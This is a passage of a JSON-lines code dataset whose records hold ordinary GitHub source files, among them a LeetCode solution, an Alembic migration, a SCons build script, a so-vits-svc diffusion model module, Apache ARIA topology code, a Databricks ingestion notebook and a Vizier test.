'Pensja', 'Wiek'])\n\n# Save to an Excel file\n\nzapis.to_excel('zapisywanie_danych_w_excelu.xlsx', index=False)\n","repo_name":"Moqosa/zapisywanie_danych_w_excelu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"40727328505","text":"# 2561. 
Rearranging Fruits\nfrom typing import List\nfrom collections import Counter, deque\n\n\nclass Solution:\n    def minCost(self, basket1: List[int], basket2: List[int]) -> int:\n        # if any count of numbers is odd, we cannot pair them up\n        c = Counter(basket1 + basket2)\n        for v in c.values():\n            if v % 2 == 1:\n                return -1\n\n        # compute l1 and l2, the list of numbers that aren't in the other baskets\n        # values in l1 and l2 represent number pairs in surplus for that respective list\n        for v in basket2:\n            # subtract 2 since values in basket2 were already counted once above\n            c[v] -= 2\n        surplus1, surplus2 = [], []\n        for k, v in c.items():\n            if v == 0:\n                continue\n            if v > 0:\n                surplus1.extend([k for _ in range(v // 2)])\n            else:\n                surplus2.extend([k for _ in range(abs(v // 2))])\n        l1, l2 = deque(sorted(surplus1)), deque(sorted(surplus2))\n\n        cost = 0\n        \"\"\"\n        for the min number pair in one list with value A and the max number pair in the other list with value B\n        we can swap one A value with one B value for cost A\n        we can also do an indirect swap by swapping twice with the smallest value for a potential lower cost\n        smallest in same list as A => swap one B value with smallest, then swap A with that smallest value\n        smallest in other list => swap one A value with smallest, then swap B value with that smallest value\n        swapping this way will always keep smallest in its original list, not that it matters\n        \"\"\"\n        indirect_swap_cost = 2 * min(min(basket1), min(basket2))\n        while l1 and l2:\n            # look at the front of l1 and l2 to determine which opposite number pairs to process, smaller will always be better\n            # the pop statements only represent the number pairs with values A and B being processed, not what swaps happened\n            if l1[0] < l2[0]:\n                cost += min(l1[0], indirect_swap_cost)\n                l1.popleft()\n                l2.pop()\n            else:\n                cost += min(l2[0], indirect_swap_cost)\n                l2.popleft()\n                l1.pop()\n\n        return cost\n","repo_name":"feefs/ps","sub_path":"leetcode-contests/weekly-331/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"11800028834","text":"\"\"\"add column to store public-id image when upload to cloudinary\n\nRevision ID: dab014f6ee4e\nRevises: 6e93b8f8c282\nCreate Date: 2021-11-27 19:02:56.377197\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'dab014f6ee4e'\ndown_revision = '6e93b8f8c282'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('user',\n        sa.Column('image_id', sa.String(length=200), nullable=True)\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('user', 'image_id')\n # ### end Alembic commands ###\n","repo_name":"truongnguyenvan8801/ManagementStudent_Flask","sub_path":"migrations/versions/dab014f6ee4e_add_column_to_store_public_id_image_.py","file_name":"dab014f6ee4e_add_column_to_store_public_id_image_.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"22704360870","text":"file1 = open('puzzle_input.csv', 'r')\n\ndef fullyContains(first, second):\n startBeforeOtherStart = int(first[0].strip()) <= int(second[0].strip())\n endAfterOtherEnd = int(first[1].strip()) >= int(second[1].strip())\n startWithinOtherRange = int(first[0].strip()) >= int(second[0].strip()) and int(first[0].strip()) <= int(second[1].strip())\n endWithinOtherRange = int(first[1].strip()) >= int(second[0].strip()) and int(first[1].strip()) <= int(second[1].strip())\n return startBeforeOtherStart or endAfterOtherEnd or startWithinOtherRange or endWithinOtherRange\n\nLines = file1.readlines()\nfullycontainedElements = 0\nfor line in Lines:\n # print(line)\n parts = line.split(',')\n # print(parts)\n limits1 = parts[0].split('-')\n # print(limits1)\n limits2 = parts[1].split('-')\n # print(limits2)\n if fullyContains(limits1, limits2) or fullyContains(limits2, limits1):\n fullycontainedElements = fullycontainedElements+1\n\nprint(fullycontainedElements)","repo_name":"Rasmus256/advent_of_code_2022","sub_path":"day4/part1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"634333721","text":"import en_core_web_sm\nimport glob\nimport csv\nimport logging\nfrom extraction_rules import InformationExtractor\nimport json\nimport urllib.request\nimport zipfile\nfrom tqdm import tqdm\n\nlogging.basicConfig(format='%(process)d-%(levelname)s-%(message)s', \n level=logging.INFO)\n\nnlp = en_core_web_sm.load()\ntsv_files = glob.glob(\"gitter-history-dfa9f2287cf20e04640646edab14e5a83a5fb0f1/archives/*.tsv\")\ndata = []\n\nif len(tsv_files) == 0:\n print('Beginning file download with urllib2...')\n url = 'https://github.com/freeCodeCamp/gitter-history/archive/dfa9f2287cf20e04640646edab14e5a83a5fb0f1.zip' \n urllib.request.urlretrieve(url, 'data.zip')\n print('Unziping data...')\n zip_ref = zipfile.ZipFile('data.zip', 'r')\n zip_ref.extractall('./')\n zip_ref.close()\n tsv_files = glob.glob(\"gitter-history-dfa9f2287cf20e04640646edab14e5a83a5fb0f1/archives/*.tsv\")\n\nextractor = InformationExtractor(nlp)\n\nfor tsv in tqdm(tsv_files):\n with open(tsv, \"r\") as f:\n reader = csv.reader(f, delimiter='\\t')\n #logging.info(\"Reading: %s\", tsv)\n for row in tqdm(reader):\n city = tsv.split(\"/\")[-1]\n text_raw = row[6]\n text = nlp(text_raw)\n\n mentions = extractor.extract_mention(text, city)\n if len(mentions) == 0:\n mentions = [{\"city\":city, \"rule\":\"MENTION\",\"text\":\"Not found\",\n \"message\":text_raw, \"sent_at\": row[2]}]\n else:\n for item in mentions:\n item.update({\"message\":text_raw})\n item.update({\"sent_at\": row[2]})\n\n data.append(mentions)\n\nwith open('raw_data.json', 'w') as f:\n flat_list = [item for sublist in data for item in sublist]\n json.dump(flat_list, 
f)\n","repo_name":"dmesquita/chi-square-test-for-homogeneity","sub_path":"extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7145005353","text":"import fnmatch\nimport os\nimport time\nimport atexit\nfrom SCons.Defaults import *\n\nrelease = True\n\nif(release):\n\toptimization = ['-O3', '-DNDEBUG', '-fno-rtti', '-fno-exceptions', '-DEMSCRIPTEN_HAS_UNBOUND_TYPE_NAMES=0']\n\tdebug = '-g0'\n\tlto = \"1\"\n\tclosure = \"0\"\n\tassertions = \"0\"\n\tdemangle = \"0\"\nelse:\n\toptimization = ['-O0']\n\tdebug = '-g3'\n\tlto = \"0\"\n\tclosure = \"0\"\n\tassertions = \"2\"\n\tdemangle = \"1\"\n\n\ndef main():\n\tenv = Environment(ENV = os.environ, tools = ['gcc', 'g++', 'gnulink', 'ar', 'gas'])\n\t\t\n\tenv.Replace(CC = \"emcc\" )\n\tenv.Replace(CXX = \"em++\" )\n\tenv.Replace(LINK = \"emcc\" )\n\t\n\tenv.Replace(AR = \"emar\" )\n\tenv.Replace(RANLIB = \"emranlib\")\n\t\n\tenv.Replace(LIBLINKPREFIX = \"\")\n\tenv.Replace(LIBPREFIX = \"\")\n\tenv.Replace(LIBLINKSUFFIX = \".bc\")\n\tenv.Replace(LIBSUFFIX = \".bc\")\n\tenv.Replace(OBJSUFFIX = \".o\")\n\tenv.Replace(PROGSUFFIX = \".html\")\n\t\n\tenv.Append( CPPFLAGS=optimization)\n\tenv.Append( LINKFLAGS=[\n\t\toptimization,\n\t\tdebug,\n\t\t\"-lGL\",\n\t\t\"-s\", \"ASSERTIONS=\" + assertions,\n\t\t\"-s\", \"DEMANGLE_SUPPORT=\" + demangle,\n \"-s\", \"ALLOW_MEMORY_GROWTH=0\",\n\t\t\"-s\", \"TOTAL_MEMORY=1023MB\",\n \"-s\", \"EXTRA_EXPORTED_RUNTIME_METHODS=[\\\"ccall\\\", \\\"cwrap\\\"]\",\n\t\t\"--llvm-lto\", lto,\n\t\t\"--closure\", closure,\n\t\t\"-s\", \"NO_EXIT_RUNTIME=1\",\n\t\t\"-s\", \"DISABLE_EXCEPTION_CATCHING=1\",\n\t\t\"--bind\",\n\t\t\"--preload-file\", \"StyleGAN.ct4\"]\n\t)\n\n\ttimeStart = time.time()\n\tatexit.register(PrintInformationOnBuildIsFinished, timeStart)\n\t\n\tIncludes = [\n\t\t\"tensor4/examples/common\",\n\t\t\"tensor4/include\",\n\t\t\"zfp/include\",\n\t]\n\n\tfiles = [\"main.cpp\", \"StyleGAN.cpp\"]\n\tzfp = Glob(\"zfp/src\", \"*.c\")\n\n\tzfpl = env.Library('zfplib', zfp, LIBS=[], CPPFLAGS=optimization + [debug], LIBPATH='.', CPPPATH = Includes)\n\tprogram = env.Program('stylegan', files, LIBS=[zfpl], CPPFLAGS=optimization + ['-std=c++14', debug], LIBPATH='.', CPPPATH = Includes)\n\t\n\t\ndef PrintInformationOnBuildIsFinished(startTimeInSeconds):\n\t\"\"\" Launched when scons is finished \"\"\"\n\tfailures = GetBuildFailures()\n\tfor failure in failures:\n\t\tprint(\"Target [%s] failed: %s\" % (failure.node, failure.errstr))\n\ttimeDelta = time.gmtime(time.time() - startTimeInSeconds)\n\tprint(time.strftime(\"Build time: %M minutes %S seconds\", timeDelta))\n\t\ndef GlobR(path, filter) : \n\tmatches = []\n\tfor root, dirnames, filenames in os.walk(path):\n \t\tfor filename in fnmatch.filter(filenames, filter):\n \t\t\tmatches.append(os.path.join(root, filename)) \n\treturn matches\n\ndef Glob(path, filter) :\n\tmatches = []\n\tonlyfiles = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]\n\tfor filename in fnmatch.filter(onlyfiles, filter):\n\t\tmatches.append(os.path.join(path, filename))\n\treturn matches\n\nif __name__ == \"SCons.Script\":\n\tmain()\n","repo_name":"podgorskiy/StyleGANCpp","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"84"} +{"seq_id":"4083666996","text":"from django.contrib import admin\nfrom 
.models import Humans,SubmitedUrls\n\n# Register your models here.\nclass URLAdmin(admin.ModelAdmin):\n\t\tmodel=SubmitedUrls\n\nclass HumansAdmin(admin.ModelAdmin):\n\tlist_display=['__unicode__','twitter','role']\n\t#inlines=[URLAdmin,]\n\t\t\nadmin.site.register(Humans,HumansAdmin)\nadmin.site.register(SubmitedUrls,URLAdmin)\n","repo_name":"forfuturellc/humans-not-robots","sub_path":"hnr/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"5596867320","text":"import os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport yaml\n\nfrom .diffusion import GaussianDiffusion\nfrom .vocoder import Vocoder\nfrom .wavenet import WaveNet\n\n\nclass DotDict(dict):\n def __getattr__(*args): \n val = dict.get(*args) \n return DotDict(val) if type(val) is dict else val \n\n __setattr__ = dict.__setitem__ \n __delattr__ = dict.__delitem__\n\n \ndef load_model_vocoder(\n model_path,\n device='cpu',\n config_path = None\n ):\n if config_path is None:\n config_file = os.path.join(os.path.split(model_path)[0], 'config.yaml')\n else:\n config_file = config_path\n\n with open(config_file, \"r\") as config:\n args = yaml.safe_load(config)\n args = DotDict(args)\n \n # load vocoder\n vocoder = Vocoder(args.vocoder.type, args.vocoder.ckpt, device=device)\n \n # load model\n model = Unit2Mel(\n args.data.encoder_out_channels, \n args.model.n_spk,\n args.model.use_pitch_aug,\n vocoder.dimension,\n args.model.n_layers,\n args.model.n_chans,\n args.model.n_hidden,\n args.model.timesteps,\n args.model.k_step_max\n )\n \n print(' [Loading] ' + model_path)\n ckpt = torch.load(model_path, map_location=torch.device(device))\n model.to(device)\n model.load_state_dict(ckpt['model'])\n model.eval()\n print(f'Loaded diffusion model, sampler is {args.infer.method}, speedup: {args.infer.speedup} ')\n return model, vocoder, args\n\n\nclass Unit2Mel(nn.Module):\n def __init__(\n self,\n input_channel,\n n_spk,\n use_pitch_aug=False,\n out_dims=128,\n n_layers=20, \n n_chans=384, \n n_hidden=256,\n timesteps=1000,\n k_step_max=1000\n ):\n super().__init__()\n self.unit_embed = nn.Linear(input_channel, n_hidden)\n self.f0_embed = nn.Linear(1, n_hidden)\n self.volume_embed = nn.Linear(1, n_hidden)\n if use_pitch_aug:\n self.aug_shift_embed = nn.Linear(1, n_hidden, bias=False)\n else:\n self.aug_shift_embed = None\n self.n_spk = n_spk\n if n_spk is not None and n_spk > 1:\n self.spk_embed = nn.Embedding(n_spk, n_hidden)\n \n self.timesteps = timesteps if timesteps is not None else 1000\n self.k_step_max = k_step_max if k_step_max is not None and k_step_max>0 and k_step_max 1:\n if spk_mix_dict is not None:\n spk_embed_mix = torch.zeros((1,1,self.hidden_size))\n for k, v in spk_mix_dict.items():\n spk_id_torch = torch.LongTensor(np.array([[k]])).to(units.device)\n spk_embeddd = self.spk_embed(spk_id_torch)\n self.speaker_map[k] = spk_embeddd\n spk_embed_mix = spk_embed_mix + v * spk_embeddd\n x = x + spk_embed_mix\n else:\n x = x + self.spk_embed(spk_id - 1)\n self.speaker_map = self.speaker_map.unsqueeze(0)\n self.speaker_map = self.speaker_map.detach()\n return x.transpose(1, 2)\n\n def init_spkmix(self, n_spk):\n self.speaker_map = torch.zeros((n_spk,1,1,self.n_hidden))\n hubert_hidden_size = self.input_channel\n n_frames = 10\n hubert = torch.randn((1, n_frames, hubert_hidden_size))\n f0 = torch.randn((1, n_frames))\n volume = torch.randn((1, n_frames))\n spks = {}\n for i in 
range(n_spk):\n spks.update({i:1.0/float(self.n_spk)})\n self.init_spkembed(hubert, f0.unsqueeze(-1), volume.unsqueeze(-1), spk_mix_dict=spks)\n\n def forward(self, units, f0, volume, spk_id = None, spk_mix_dict = None, aug_shift = None,\n gt_spec=None, infer=True, infer_speedup=10, method='dpm-solver', k_step=300, use_tqdm=True):\n \n '''\n input: \n B x n_frames x n_unit\n return: \n dict of B x n_frames x feat\n '''\n\n if not self.training and gt_spec is not None and k_step>self.k_step_max:\n raise Exception(\"The shallow diffusion k_step is greater than the maximum diffusion k_step(k_step_max)!\")\n\n if not self.training and gt_spec is None and self.k_step_max!=self.timesteps:\n raise Exception(\"This model can only be used for shallow diffusion and can not infer alone!\")\n\n x = self.unit_embed(units) + self.f0_embed((1+ f0 / 700).log()) + self.volume_embed(volume)\n if self.n_spk is not None and self.n_spk > 1:\n if spk_mix_dict is not None:\n for k, v in spk_mix_dict.items():\n spk_id_torch = torch.LongTensor(np.array([[k]])).to(units.device)\n x = x + v * self.spk_embed(spk_id_torch)\n else:\n if spk_id.shape[1] > 1:\n g = spk_id.reshape((spk_id.shape[0], spk_id.shape[1], 1, 1, 1)) # [N, S, B, 1, 1]\n g = g * self.speaker_map # [N, S, B, 1, H]\n g = torch.sum(g, dim=1) # [N, 1, B, 1, H]\n g = g.transpose(0, -1).transpose(0, -2).squeeze(0) # [B, H, N]\n x = x + g\n else:\n x = x + self.spk_embed(spk_id)\n if self.aug_shift_embed is not None and aug_shift is not None:\n x = x + self.aug_shift_embed(aug_shift / 5) \n x = self.decoder(x, gt_spec=gt_spec, infer=infer, infer_speedup=infer_speedup, method=method, k_step=k_step, use_tqdm=use_tqdm)\n \n return x\n\n","repo_name":"svc-develop-team/so-vits-svc","sub_path":"diffusion/unit2mel.py","file_name":"unit2mel.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":20915,"dataset":"github-code","pt":"84"} +{"seq_id":"40727328505","text":"from ...parser.validation import issue\nfrom ...modeling import models\nfrom ...utils import console\nfrom . 
import (\n template_handler,\n instance_handler,\n common\n)\n\n\nclass Topology(issue.ReporterMixin):\n\n _init_map = {\n models.ServiceTemplate: models.Service,\n models.ArtifactTemplate: models.Artifact,\n models.CapabilityTemplate: models.Capability,\n models.GroupTemplate: models.Group,\n models.InterfaceTemplate: models.Interface,\n models.NodeTemplate: models.Node,\n models.PolicyTemplate: models.Policy,\n models.SubstitutionTemplate: models.Substitution,\n models.RelationshipTemplate: models.Relationship,\n models.OperationTemplate: models.Operation,\n models.SubstitutionTemplateMapping: models.SubstitutionMapping,\n\n # Common\n models.Metadata: models.Metadata,\n models.Attribute: models.Attribute,\n models.Property: models.Property,\n models.Input: models.Input,\n models.Output: models.Output,\n models.Configuration: models.Configuration,\n models.Argument: models.Argument,\n models.Type: models.Type\n }\n\n def __init__(self, *args, **kwargs):\n super(Topology, self).__init__(*args, **kwargs)\n self._model_cls_to_handler = dict(self._init_handlers(instance_handler),\n **self._init_handlers(template_handler))\n\n @staticmethod\n def _init_handlers(module_):\n \"\"\"\n Register handlers from a handler module to the models.\n\n :param module_: the module to look for handlers\n :returns: dict where the key is the models class, and the value is the handler class\n associated with it from the provided module\n \"\"\"\n handlers = {}\n for attribute_name in dir(module_):\n if attribute_name.startswith('_'):\n continue\n attribute = getattr(module_, attribute_name)\n if isinstance(attribute, type) and issubclass(attribute, common.HandlerBase):\n handlers[getattr(models, attribute_name)] = attribute\n return handlers\n\n def instantiate(self, model, **kwargs):\n \"\"\"\n Instantiate the provided model.\n\n :param model:\n :param kwargs:\n :returns:\n \"\"\"\n if isinstance(model, dict):\n return dict((name, self.instantiate(value, **kwargs))\n for name, value in model.iteritems())\n elif isinstance(model, list):\n return list(self.instantiate(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n model_instance_cls = self._init_map[model.__class__]\n return _handler(self, model).instantiate(model_instance_cls, **kwargs)\n\n def validate(self, model, **kwargs):\n if isinstance(model, dict):\n return self.validate(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.validate(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).validate(**kwargs)\n\n def dump(self, model, out_stream=None, title=None, **kwargs):\n out_stream = out_stream or console.TopologyStylizer()\n\n # if model is empty, no need to print out the section name\n if model and title:\n out_stream.write('{0}:'.format(title))\n\n if isinstance(model, dict):\n if str(out_stream):\n with out_stream.indent():\n return self.dump(model.values(), out_stream=out_stream, **kwargs)\n else:\n return self.dump(model.values(), out_stream=out_stream, **kwargs)\n\n elif isinstance(model, list):\n for value in model:\n self.dump(value, out_stream=out_stream, **kwargs)\n\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n _handler(self, model).dump(out_stream=out_stream, **kwargs)\n\n return out_stream\n\n def dump_graph(self, service):\n out_stream = console.TopologyStylizer()\n for node in service.nodes.itervalues():\n if 
not node.inbound_relationships:\n self._dump_graph_node(out_stream, node)\n return out_stream\n\n def _dump_graph_node(self, out_stream, node, capability=None):\n out_stream.write(out_stream.node_style(node.name))\n if capability is not None:\n out_stream.write('{0} ({1})'.format(out_stream.property_style(capability.name),\n out_stream.type_style(capability.type.name)))\n if node.outbound_relationships:\n with out_stream.indent():\n for relationship_model in node.outbound_relationships:\n styled_relationship_name = out_stream.property_style(relationship_model.name)\n if relationship_model.type is not None:\n out_stream.write('-> {0} ({1})'.format(\n styled_relationship_name,\n out_stream.type_style(relationship_model.type.name)))\n else:\n out_stream.write('-> {0}'.format(styled_relationship_name))\n with out_stream.indent(3):\n self._dump_graph_node(out_stream,\n relationship_model.target_node,\n relationship_model.target_capability)\n\n def coerce(self, model, **kwargs):\n if isinstance(model, dict):\n return self.coerce(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.coerce(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).coerce(**kwargs)\n\n def dump_types(self, service_template, out_stream=None):\n out_stream = out_stream or console.TopologyStylizer()\n self.dump(service_template.node_types, out_stream, 'Node types')\n self.dump(service_template.group_types, out_stream, 'Group types')\n self.dump(service_template.capability_types, out_stream, 'Capability types')\n self.dump(service_template.relationship_types, out_stream, 'Relationship types')\n self.dump(service_template.policy_types, out_stream, 'Policy types')\n self.dump(service_template.artifact_types, out_stream, 'Artifact types')\n self.dump(service_template.interface_types, out_stream, 'Interface types')\n\n return out_stream\n\n def satisfy_requirements(self, model, **kwargs):\n if isinstance(model, dict):\n return self.satisfy_requirements(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.satisfy_requirements(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).satisfy_requirements(**kwargs)\n\n def validate_capabilities(self, model, **kwargs):\n if isinstance(model, dict):\n return self.validate_capabilities(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.validate_capabilities(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).validate_capabilities(**kwargs)\n\n def _find_host(self, node):\n if node.type.role == 'host':\n return node\n\n def target_has_role(rel, role):\n return (rel.target_capability is not None and\n rel.target_capability.type.role == role)\n\n for outbound_relationship in node.outbound_relationships:\n if target_has_role(outbound_relationship, 'host'):\n host = self._find_host(outbound_relationship.target_node)\n if host is not None:\n return host\n for inbound_relationship in node.inbound_relationships:\n if target_has_role(inbound_relationship, 'feature'):\n host = self._find_host(inbound_relationship.source_node)\n if host is not None:\n return host\n return None\n\n def assign_hosts(self, service):\n for node in service.nodes.values():\n node.host = self._find_host(node)\n\n def configure_operations(self, model, **kwargs):\n 
if isinstance(model, dict):\n return self.configure_operations(model.values(), **kwargs)\n elif isinstance(model, list):\n return all(self.configure_operations(value, **kwargs) for value in model)\n elif model is not None:\n _handler = self._model_cls_to_handler[model.__class__]\n return _handler(self, model).configure_operations(**kwargs)\n","repo_name":"onap/archive-multicloud-azure","sub_path":"azure/aria/aria-extension-cloudify/src/aria/aria/orchestrator/topology/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":9084,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"74429137873","text":"# https://www.acmicpc.net/problem/21736\nimport sys\nfrom collections import deque\nsys.stdin = open('input.txt','r')\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\nmatrix = []\nvisited = [[False]*M for _ in range(N)]\nanswer, x, y = 0, 0, 0\nfor r in range(N):\n arr = list(input().rstrip())\n if 'I' in arr:\n x, y = r, arr.index('I')\n matrix.append(arr)\n\nqueue = deque([(x,y)])\nvisited[x][y] = True\nwhile queue:\n r, c = queue.popleft()\n for dx, dy in ((1,0),(0,1),(-1,0),(0,-1)):\n nx, ny = r+dx, c+dy\n if 0 <= nx < N and 0 <= ny < M and\\\n not visited[nx][ny] and matrix[nx][ny] != 'X':\n visited[nx][ny] = True\n if matrix[nx][ny] == 'P': answer += 1\n queue.append((nx,ny))\nprint(answer or 'TT')","repo_name":"yj95228/practice-coding-test","sub_path":"python/baekjoon/[21736] 헌내기는 친구가 필요해.py","file_name":"[21736] 헌내기는 친구가 필요해.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"10967406668","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Ingest pit_stops.json file\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_data_source\",\"\")\nv_data_source = dbutils.widgets.get(\"p_data_source\")\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\",\"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/common_functions\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import current_timestamp, col, concat, lit\nfrom pyspark.sql.types import StructType, StructField, IntegerType, StringType, DateType, FloatType, TimestampType\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### step 1 - Reading the JSON file using dataframe reader\n\n# COMMAND ----------\n\npit_stops_schema = StructType(fields=[\n StructField(\"raceId\", IntegerType(),False),\n StructField(\"driverId\", IntegerType(),True),\n StructField(\"stop\", StringType(),True),\n StructField(\"lap\", IntegerType(),True),\n StructField(\"time\", StringType(),True),\n StructField(\"duration\", StringType(),True),\n StructField(\"milliseconds\", IntegerType(),True),\n])\n\n# COMMAND ----------\n\npit_stops_df = spark.read.schema(pit_stops_schema) \\\n.option(\"multiline\", True) \\\n.json(f\"{raw_folder_path}{v_file_date}/pit_stops.json\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### step 2 - Renaming columns and adding new ones\n\n# COMMAND ----------\n\npit_stops_final_df = pit_stops_df \\\n.withColumnRenamed(\"raceId\",\"race_id\") \\\n.withColumnRenamed(\"driverId\",\"driver_id\") \\\n.withColumn(\"data_source\", lit(v_data_source)) \\\n.withColumn(\"file_date\", lit(v_file_date)) \\\n.withColumn(\"ingestion_date\", current_timestamp())\n\n# COMMAND ----------\n\n# MAGIC %md\n# 
MAGIC ~~step 3 - write the data to parquet~~\n\n# COMMAND ----------\n\n# pit_stops_final_df.write.mode(\"overwrite\").parquet(f\"{processed_folder_path}pit_stops\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### step 3 - Writing data to f1_proccesed database as parquet\n\n# COMMAND ----------\n\n# overwrite_partition(pit_stops_final_df,'f1_processed','pit_stops','race_id')\nmerge_condition = \"tgt.driver_id = src.driver_id AND tgt.race_id = src.race_id AND tgt.stop = src.stop\"\nmerge_delta_data(pit_stops_final_df,'f1_processed','pit_stops', processed_folder_path, merge_condition, 'race_id')\n\n# COMMAND ----------\n\ndbutils.notebook.exit(\"Done 😎\")\n","repo_name":"Marcynas/DataBricksFormula1","sub_path":"F1project/ingestion/6.ingest_pit_stops_file.py","file_name":"6.ingest_pit_stops_file.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"34308237924","text":"import numpy as np\nfrom vizier import algorithms as vza\nfrom vizier import benchmarks\nfrom vizier import pyvizier as vz\nfrom vizier._src.algorithms.designers import random\nfrom vizier._src.algorithms.testing import convergence_runner\nfrom vizier._src.algorithms.testing import test_runners\nfrom vizier._src.benchmarks.experimenters import shifting_experimenter\nfrom vizier._src.benchmarks.experimenters.synthetic import bbob\nfrom vizier.testing import test_studies\n\nfrom absl.testing import absltest\n\n\nclass RandomTest(absltest.TestCase):\n\n def test_on_flat_space(self):\n config = vz.ProblemStatement(test_studies.flat_space_with_all_types())\n designer = random.RandomDesigner(config.search_space, seed=None)\n self.assertLen(\n test_runners.run_with_random_metrics(\n designer, config, iters=50, batch_size=1), 50)\n\n def test_reproducible_random(self):\n config = vz.ProblemStatement(test_studies.flat_space_with_all_types())\n designer = random.RandomDesigner(config.search_space, seed=5)\n t1 = designer.suggest(10)\n\n designer = random.RandomDesigner(config.search_space, seed=5)\n t2 = designer.suggest(10)\n self.assertEqual(t1, t2)\n\n def test_convergence_1d(self):\n problem = bbob.DefaultBBOBProblemStatement(1)\n experimenter = shifting_experimenter.ShiftingExperimenter(\n exptr=benchmarks.NumpyExperimenter(bbob.Sphere, problem),\n shift=np.random.random())\n\n def _random_designer_factory(problem: vz.ProblemStatement) -> vza.Designer:\n return random.RandomDesigner(problem.search_space)\n\n benchmark_state_factory = benchmarks.DesignerBenchmarkStateFactory(\n designer_factory=_random_designer_factory,\n experimenter=experimenter,\n )\n convergence_test = convergence_runner.BenchmarkConvergenceRunner(\n benchmark_state_factory=benchmark_state_factory,\n trials_per_check=5000,\n repeated_checks=5,\n success_rate_threshold=0.6,\n tolerance=1.0)\n convergence_test.assert_converges()\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"ranggakd/vizier","sub_path":"vizier/_src/algorithms/designers/random_test.py","file_name":"random_test.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"84"} +{"seq_id":"38432112990","text":"import pandas as pd\nfrom collections import defaultdict\n\n\"\"\"\nDATA PREPARATION FUNCTIONS\n\"\"\"\n\n\ndef get_uid_to_curbreadcrumbs_tsprequest(tripdatas_df):\n uid_to_curbreadcrumbs = tripdatas_df[tripdatas_df[\"event\"] == \"TSP request\"]\n uid_to_curbreadcrumbs = (\n 
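# (Editor's worked example, hypothetical data -- not in the original source:\n        # groupby(\"uid\")[\"event\"].count() yields one row per uid, e.g. events for uids\n        # ['a', 'a', 'b'] collapse to {'uid': ['a', 'b'], 'event': [2, 1]}.)\n        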
